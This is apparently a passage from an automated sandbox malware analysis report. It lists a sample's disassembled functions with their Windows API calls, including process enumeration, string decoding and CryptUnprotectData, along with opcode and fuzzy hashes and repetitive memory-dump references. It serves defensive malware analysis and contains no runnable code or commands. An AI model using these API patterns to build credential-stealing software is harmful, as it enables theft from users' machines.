                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (J~$PS;{$;;7$_?\
                                  • API String ID: 0-2974008455
                                  • Opcode ID: 08754e7f7ca433de7fd0c88b1ce5aa0b294bb1d83fb8487a1a324704e6e2cdf6
                                  • Instruction ID: daa9bee8406318c750c466c5c409eb1b605c224aceee68c0712d9468de2165ea
                                  • Opcode Fuzzy Hash: 08754e7f7ca433de7fd0c88b1ce5aa0b294bb1d83fb8487a1a324704e6e2cdf6
                                  • Instruction Fuzzy Hash: C19205F3A0C214AFE704AE2DEC4567ABBE5EF94320F16493DEAC4C7744EA3558018697
                                  Function 00FD3A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00FD71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00FD71FE
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FD3A96
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00FD3AA9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD3ABF
                                    • Part of subcall function 00FD7310: lstrlen.KERNEL32(------,00FB5BEB), ref: 00FD731B
                                    • Part of subcall function 00FD7310: lstrcpy.KERNEL32(00000000), ref: 00FD733F
                                    • Part of subcall function 00FD7310: lstrcat.KERNEL32(?,------), ref: 00FD7349
                                    • Part of subcall function 00FD7280: lstrcpy.KERNEL32(00000000), ref: 00FD72AE
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD3BF7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: c5db60ef511a5b8a834716be582625c32fdf0cf13e3160164993ab999e72eb38
                                  • Instruction ID: ff508232303f8099c2d614a639c829b4f549df1b60c078249b511c9e41e5273a
                                  • Opcode Fuzzy Hash: c5db60ef511a5b8a834716be582625c32fdf0cf13e3160164993ab999e72eb38
                                  • Instruction Fuzzy Hash: AB81E331901204CFC729CF58D948B95B7E2BB84329F2DC1AAD5089B3A2D776DD82DF81
                                  Function 00FBEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00FBEA76
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00FBEA7E
                                  • lstrcat.KERNEL32(00FDCFEC,00FDCFEC), ref: 00FBEB27
                                  • lstrcat.KERNEL32(00FDCFEC,00FDCFEC), ref: 00FBEB49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 28bddbb51f349258826605c26e6749ed9e40087f204cbbe20474d62b590b7230
                                  • Instruction ID: 87166beda53b1d6027ada76e77627914ba73758d1a842487bbbbc700d1e5385d
                                  • Opcode Fuzzy Hash: 28bddbb51f349258826605c26e6749ed9e40087f204cbbe20474d62b590b7230
                                  • Instruction Fuzzy Hash: 8A31E475A00119ABDB109BD8EC45FEEB7BE9F84715F0440B5F909E6240D7B15A44CBA2
                                  Function 00FD40B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00FD40CD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00FD40DC
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD40E3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00FD4113
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                  • String ID:
                                  • API String ID: 3825993179-0
                                  • Opcode ID: 845328821e62b1ca5156d0911d0b72f00afe6064acfff8c45b239ed319acf7e3
                                  • Instruction ID: ee2ac8fbf1634749815d7646acb610c67dd27ea88305ce95ab3adf668b551aef
                                  • Opcode Fuzzy Hash: 845328821e62b1ca5156d0911d0b72f00afe6064acfff8c45b239ed319acf7e3
                                  • Instruction Fuzzy Hash: 55011E70600209ABDB24DFE5DC49BAABBEDEF45321F108169BD0987340DA71A980DB54
                                  Function 00FD2B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00FDA3D0,000000FF), ref: 00FD2B8F
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00FD2B96
                                  • GetLocalTime.KERNEL32(?,?,00000000,00FDA3D0,000000FF), ref: 00FD2BA2
                                  • wsprintfA.USER32 ref: 00FD2BCE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: c43e9b2accf59da57fd3cea2d382abc676e5cfc7afd5d81c591f0f66a4a529dd
                                  • Instruction ID: efc9ef5fe921469e95dc2fc1a27357782c877d3eccb20b231dce453389410f78
                                  • Opcode Fuzzy Hash: c43e9b2accf59da57fd3cea2d382abc676e5cfc7afd5d81c591f0f66a4a529dd
                                  • Instruction Fuzzy Hash: AB0140B2904128ABCB249BC9DD45BBFBBFDFB4CB11F00011AF615A6280E7785540C7B1
                                  Function 00FB9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00FB9B3B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FB9B4A
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00FB9B61
                                  • LocalFree.KERNEL32 ref: 00FB9B70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: d1ac30a6f8598152d196af31618dcce25fcb1fa3986bc4c29b66ad5c62b465d4
                                  • Instruction ID: 5e658c0702a1d6e8e238aa9a3e5a2ddcf830830531c02563f6fae50715e8c021
                                  • Opcode Fuzzy Hash: d1ac30a6f8598152d196af31618dcce25fcb1fa3986bc4c29b66ad5c62b465d4
                                  • Instruction Fuzzy Hash: C7F0F9B06443126BE7305BA5AC49F967BA8AB44B60F200124FA45EA2C4D7B49880CBA4
                                  Function 013745B0 Relevance: 5.1, Strings: 3, Instructions: 1351COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (zs9$4,7}$A&s
                                  • API String ID: 0-1036545355
                                  • Opcode ID: e40d5996f97b74730c3a34e4956ecca02483116427118eb32abb53ffe429db18
                                  • Instruction ID: 1f4ff4e9ad650cf717a1d37e6b697493dad194ca2b69db07eb6ae1ec13b9dd0b
                                  • Opcode Fuzzy Hash: e40d5996f97b74730c3a34e4956ecca02483116427118eb32abb53ffe429db18
                                  • Instruction Fuzzy Hash: D19209F360C2149FE3046E2DEC8567ABBE9EF94320F1A493DEAC5C7744EA3558018697
                                  Function 00FCCAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(00FDB110,00000000,00000001,00FDB100,?), ref: 00FCCB06
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00FCCB46
                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 00FCCBC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 1940255200-0
                                  • Opcode ID: f899eea8737c7ac3d5fa8be2321e33da867d367dac379b26207ef7683e4c3b7c
                                  • Instruction ID: 168ff68ee6b86f3193f553fa5425822d670b86c2544780b0d41a5dbe532a4b07
                                  • Opcode Fuzzy Hash: f899eea8737c7ac3d5fa8be2321e33da867d367dac379b26207ef7683e4c3b7c
                                  • Instruction Fuzzy Hash: 5F314471A40619AFD714DBD4CC92FAAB7B99B88B10F104198FA14EB2D0D7B0AE45CBD1
                                  Function 00FB9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B9F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9BB3
                                  • LocalFree.KERNEL32(?), ref: 00FB9BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: e00ef50e16f8faddae95997f3d7a61b637ca134fbdb8ac7f18922e6a0acd0b2e
                                  • Instruction ID: 2f7ada3bce11693de2db9e43998eb0a4d8f08eb39a21341d4bc2334b0a389150
                                  • Opcode Fuzzy Hash: e00ef50e16f8faddae95997f3d7a61b637ca134fbdb8ac7f18922e6a0acd0b2e
                                  • Instruction Fuzzy Hash: F30112B5E412096BE714DBE4DC45FABB778EB84704F104558EA04AB284D7B09E008BD1
                                  Function 01369F4F Relevance: 4.2, Strings: 2, Instructions: 1655COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: =b$@zN
                                  • API String ID: 0-939165417
                                  • Opcode ID: 3d09591de9f2f74b3964e23c2c5e25cadf04b9a2357321f23c882c20c6cc569a
                                  • Instruction ID: 941524f58b18988f0b847b1fa56a1b97fe9161b01747afedc9ceeda88672d534
                                  • Opcode Fuzzy Hash: 3d09591de9f2f74b3964e23c2c5e25cadf04b9a2357321f23c882c20c6cc569a
                                  • Instruction Fuzzy Hash: 97B208F360C2049FE304AE2DEC8577ABBE9EBD4720F1A853DE6C4C7744E63598058696
                                  Function 01363BD0 Relevance: 3.6, Strings: 2, Instructions: 1098COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
